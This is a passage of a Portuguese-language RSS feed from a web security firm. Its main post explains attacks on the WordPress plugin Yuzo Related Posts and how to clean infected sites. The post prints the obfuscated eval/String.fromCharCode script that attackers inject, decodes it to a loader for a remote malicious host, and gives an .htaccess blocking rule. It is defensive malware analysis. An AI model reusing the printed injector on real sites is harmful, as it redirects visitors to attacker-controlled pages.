<p>Como a falha permite que strings e scripts js sejam inseridos no banco, a remoção irá depender do conteúdo que o invasor inseriu.</p>
<p>Caso seu site esteja redirecionando para sites maliciosos você pode contar com nosso serviço de <a href="https://www.ethsecurity.com.br/remocao-de-malwares/" target="_blank" rel="noopener noreferrer">remoção de malware</a> para lhe auxiliar.</p>
<p>&nbsp;</p>
<p>O post <a href="https://ethsecurity.com.br/vulnerabilidade-no-plugin-custom-field-suit-do-wordpress/">Vulnerabilidade no Plugin Custom Field Suit do WordPress</a> apareceu primeiro em <a href="https://ethsecurity.com.br">ETH SECURITY</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://ethsecurity.com.br/vulnerabilidade-no-plugin-custom-field-suit-do-wordpress/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">308</post-id>	</item>
		<item>
		<title>[Vídeo] Ataques no Plugin Yuzo Related Posts, como remover a infecção</title>
		<link>https://ethsecurity.com.br/ataques-no-plugin-yuzo-related-posts-remover-a-infeccao/</link>
					<comments>https://ethsecurity.com.br/ataques-no-plugin-yuzo-related-posts-remover-a-infeccao/#comments</comments>
		
		<dc:creator><![CDATA[defensorweb]]></dc:creator>
		<pubDate>Fri, 19 Apr 2019 12:06:24 +0000</pubDate>
				<category><![CDATA[remoção de malware]]></category>
		<category><![CDATA[Segurança na web]]></category>
		<category><![CDATA[Segurança wordpress]]></category>
		<category><![CDATA[plugin]]></category>
		<category><![CDATA[remoção de malwares]]></category>
		<category><![CDATA[security]]></category>
		<category><![CDATA[segurança]]></category>
		<category><![CDATA[segurança de sites]]></category>
		<category><![CDATA[segurança web]]></category>
		<category><![CDATA[segurança wordpress]]></category>
		<category><![CDATA[virus de site]]></category>
		<category><![CDATA[wordpress]]></category>
		<guid isPermaLink="false">https://www.ethsecurity.com.br/?p=138</guid>

					<description><![CDATA[<p>Recentemente vários ataques estão sendo direcionados para o plugin Yuzo Related Posts, utilizado por cerca de 60.000 sites WordPress. A vulnerabilidade se assemelha ao Social Warfare e ao Yellow Pencil, as rotinas do plugin que fazem com que o mesmo salve configurações na base de dados carecem de uma autenticação de segurança, o que faz [&#8230;]</p>
<p>O post <a href="https://ethsecurity.com.br/ataques-no-plugin-yuzo-related-posts-remover-a-infeccao/">[Vídeo] Ataques no Plugin Yuzo Related Posts, como remover a infecção</a> apareceu primeiro em <a href="https://ethsecurity.com.br">ETH SECURITY</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>Recentemente vários ataques estão sendo direcionados para o plugin Yuzo Related Posts, utilizado por cerca de 60.000 sites WordPress. A vulnerabilidade se assemelha ao Social Warfare e ao Yellow Pencil, as rotinas do plugin que fazem com que o mesmo salve configurações na base de dados carecem de uma autenticação de segurança, o que faz que a falha seja explorada.</p>
<p><iframe loading="lazy" width="1200" height="675" src="https://www.youtube.com/embed/0iJeesXerGs?feature=oembed" frameborder="0" allow="accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture" allowfullscreen></iframe></p>
<h3>Infecção:</h3>
<p>Uma vez explorada o invasor insere um código malicioso como da imagem abaixo:</p>
<p><strong><code class="plain">&lt;script language=javascript&gt;</code></strong><strong><code class="functions">eval</code></strong><strong><code class="plain">(String.fromCharCode(118, 97, 114, 32, 100, 100, 32, 61, 32, 83, 116, 114, 105, 110, 103, 46, 102, 114, 111, 109, 67, 104, 97, 114, 67, 111, 100, 101, 40, 49, 49, 53, 44, 32, 57, 57, 44, 32, 49, 49, 52, 44, 32, 49, 48, 53, 44, 32, 49, 49, 50, 44, 32, 49, 49, 54, 41, 59, 118, 97, 114, 32, 101, 108, 101, 109, 32, 61, 32, 100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 114, 101, 97, 116, 101, 69, 108, 101, 109, 101, 110, 116, 40, 100, 100, 41, 59, 32, 118, 97, 114, 32, 104, 104, 32, 61, 32, 83, 116, 114, 105, 110, 103, 46, 102, 114, 111, 109, 67, 104, 97, 114, 67, 111, 100, 101, 40, 49, 48, 52, 44, 32, 49, 48, 49, 44, 32, 57, 55, 44, 32, 49, 48, 48, 41, 59, 118, 97, 114, 32, 122, 122, 32, 61, 32, 83, 116, 114, 105, 110, 103, 46, 102, 114, 111, 109, 67, 104, 97, 114, 67, 111, 100, 101, 40, 49, 49, 54, 44, 32, 49, 48, 49, 44, 32, 49, 50, 48, 44, 32, 49, 49, 54, 44, 32, 52, 55, 44, 32, 49, 48, 54, 44, 32, 57, 55, 44, 32, 49, 49, 56, 44, 32, 57, 55, 44, 32, 49, 49, 53, 44, 32, 57, 57, 44, 32, 49, 49, 52, 44, 32, 49, 48, 53, 44, 32, 49, 49, 50, 44, 32, 49, 49, 54, 41, 59, 101, 108, 101, 109, 46, 116, 121, 112, 101, 32, 61, 32, 122, 122, 59, 32, 101, 108, 101, 109, 46, 97, 115, 121, 110, 99, 32, 61, 32, 116, 114, 117, 101, 59, 101, 108, 101, 109, 46, 115, 114, 99, 32, 61, 32, 83, 116, 114, 105, 110, 103, 46, 102, 114, 111, 109, 67, 104, 97, 114, 67, 111, 100, 101, 40, 49, 48, 52, 44, 32, 49, 49, 54, 44, 32, 49, 49, 54, 44, 32, 49, 49, 50, 44, 32, 49, 49, 53, 44, 32, 53, 56, 44, 32, 52, 55, 44, 32, 52, 55, 44, 32, 49, 48, 52, 44, 32, 49, 48, 49, 44, 32, 49, 48, 56, 44, 32, 49, 48, 56, 44, 32, 49, 49, 49, 44, 32, 49, 48, 50, 44, 32, 49, 49, 52, 44, 32, 49, 49, 49, 44, 32, 49, 48, 57, 44, 32, 49, 48, 52, 44, 32, 49, 49, 49, 44, 32, 49, 49, 48, 44, 32, 49, 50, 49, 44, 32, 52, 54, 44, 32, 49, 49, 49, 44, 32, 49, 49, 52, 44, 32, 49, 48, 51, 44, 32, 52, 55, 44, 32, 57, 57, 44, 32, 49, 49, 49, 44, 32, 49, 49, 55, 44, 32, 49, 49, 48, 44, 32, 49, 49, 54, 44, 32, 49, 48, 49, 44, 32, 49, 49, 52, 41, 59, 100, 111, 99, 117, 109, 101, 110, 116, 46, 103, 101, 116, 69, 108, 101, 109, 101, 110, 116, 115, 66, 121, 84, 97, 103, 78, 97, 109, 101, 40, 104, 104, 41, 91, 48, 93, 46, 97, 112, 112, 101, 110, 100, 67, 104, 105, 108, 100, 40, 101, 108, 101, 109, 41, 59));&lt;/script&gt;</code></strong></p>
<p>O código descriptografado fica dessa maneira:</p>
<p><strong>&lt;/style&gt;&lt;script language=javascript&gt;var elem = document.createElement(&#8216;script&#8217;);</strong></p>
<p><strong>elem.type = &#8216;text/javascript&#8217;;</strong></p>
<p><strong>elem.async = true; elem.src = &#8216;hxxps://hellofromhony[.]org/counter&#8217;;</strong></p>
<p><strong>document.getElementsByTagName(&#8216;head&#8217;)[0].appendChild(elem);&lt;/script&gt;</strong></p>
<p>Assim quando o site é acessado o usuário e redirecionado para sites maliciosos.</p>
<p><!-- LOMADEE - BEGIN --><br />
<script src="//ad.lomadee.com/banners/script.js?sourceId=36131687&#038;dimension=9&#038;height=350&#038;width=350&#038;method=0" type="text/javascript" language="javascript"></script><br />
<!-- LOMADEE - END --></p>
<h3>Removendo a infecção:</h3>
<p>Primeiramente faça um backup de sua base de dados, pois caso dê algo errado você terá uma cópia de segurança.</p>
<p>Acesse seu PhpMyAdmin ou o gerenciador de banco de dados de sua preferência e clique na base de dados e em pesquisar, adicione a string &#8220;String.fromCharCode(118&#8221; ,sem aspas, no campo de pesquisa e clique em selecionar todas as tabelas e cliquem em executar no canto a direita:</p>
<p><img loading="lazy" decoding="async" class="size-medium wp-image-161 aligncenter" src="https://www.ethsecurity.com.br/wp-content/uploads/2019/04/how-to-300x240.png" alt="" width="300" height="240" srcset="https://ethsecurity.com.br/wp-content/uploads/2019/04/how-to-300x240.png 300w, https://ethsecurity.com.br/wp-content/uploads/2019/04/how-to.png 631w" sizes="auto, (max-width: 300px) 100vw, 300px" /></p>
<p>Após isso você verá que o conteúdo foi encontrado na tabela wp_options:</p>
<p><img loading="lazy" decoding="async" class="aligncenter wp-image-162" src="https://www.ethsecurity.com.br/wp-content/uploads/2019/04/how-to-2-300x240.png" alt="" width="328" height="262" srcset="https://ethsecurity.com.br/wp-content/uploads/2019/04/how-to-2-300x240.png 300w, https://ethsecurity.com.br/wp-content/uploads/2019/04/how-to-2.png 631w" sizes="auto, (max-width: 328px) 100vw, 328px" /></p>
<p>Copie todo o conteúdo para um bloco de notas e remova exatamente o conteúdo que foi citado acima e substitua na tabela citada pelo conteúdo sem a infecção.</p>
<p>&nbsp;</p>
<h3>Contra medida:</h3>
<p>&nbsp;</p>
<h3><img loading="lazy" decoding="async" class="alignnone size-medium wp-image-90" src="https://www.ethsecurity.com.br/wp-content/uploads/2019/04/frances-police-moves-to-ubuntu-linux-from-windows3645899823691514234-300x225.png" alt="" width="300" height="225" srcset="https://ethsecurity.com.br/wp-content/uploads/2019/04/frances-police-moves-to-ubuntu-linux-from-windows3645899823691514234-300x225.png 300w, https://ethsecurity.com.br/wp-content/uploads/2019/04/frances-police-moves-to-ubuntu-linux-from-windows3645899823691514234-768x576.png 768w, https://ethsecurity.com.br/wp-content/uploads/2019/04/frances-police-moves-to-ubuntu-linux-from-windows3645899823691514234-700x525.png 700w, https://ethsecurity.com.br/wp-content/uploads/2019/04/frances-police-moves-to-ubuntu-linux-from-windows3645899823691514234.png 770w" sizes="auto, (max-width: 300px) 100vw, 300px" /></h3>
<p>Ainda não foi publicada uma atualização para o problema, então a recomendação é de que o plugin seja totalmente removido de sua instalação até que o desenvolvedor publique uma correção:</p>
<p>https://wordpress.org/support/topic/remove-this-plugin-immediately/</p>
<p>Como dito no vídeo criei um htaccess para que você possa se proteger dessa falha caso deseje manter o plugin, porém essa medida serve somente para esse tipo de ataque, pois o invasor pode alterar o modo como realiza a requisição, porém já é o bastante para bloquear o processo automático que ocorre nesse momento na internet:</p>
<p>&nbsp;</p>
<p>RewriteEngine on<br />
ErrorDocument 406 &#8220;&lt;head&gt;&lt;title&gt;Bad Request!&lt;/title&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Blocked by Defensor Web!&lt;/h1&gt;&lt;p&gt;Hacking Attempt!. &lt;/p&gt;&lt;/body&gt;&lt;/html&gt;&#8221;<br />
RewriteEngine On<br />
RewriteCond %{THE_REQUEST} &#8220;POST \/wp-admin\/admin-post\.php\?page\=yuzo-related-post HTTP\/1.1&#8221; [NC]<br />
RewriteRule .* – [R=406,L]</p>
<p>&nbsp;</p>
<p>As aspas podem colar incorretamente em seu htaccess, então disponibilizei o código raw no pastebin:</p>
<p><a href="https://pastebin.com/GKYBv5Qt">https://pastebin.com/GKYBv5Qt</a></p>
<p>&nbsp;</p>
<p>Dúvidas e sugestões fiquem a vontade para se expressarem nos comentários.</p>
<h1>Site infectado? Não consegue resolver?</h1>
<p>Entre em contato agora com nossa consultoria especializada através do link <a href="https://www.ethsecurity.com.br/remocao-de-malwares/">Remoção de Malware</a> em nosso site.</p>
<p><!-- LOMADEE - BEGIN --><br />
<script src="//ad.lomadee.com/banners/script.js?sourceId=36131687&#038;dimension=9&#038;height=350&#038;width=350&#038;method=0" type="text/javascript" language="javascript"></script><br />
<!-- LOMADEE - END --></p>
<p>O post <a href="https://ethsecurity.com.br/ataques-no-plugin-yuzo-related-posts-remover-a-infeccao/">[Vídeo] Ataques no Plugin Yuzo Related Posts, como remover a infecção</a> apareceu primeiro em <a href="https://ethsecurity.com.br">ETH SECURITY</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://ethsecurity.com.br/ataques-no-plugin-yuzo-related-posts-remover-a-infeccao/feed/</wfw:commentRss>
			<slash:comments>2</slash:comments>
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">138</post-id>	</item>
	</channel>
</rss>
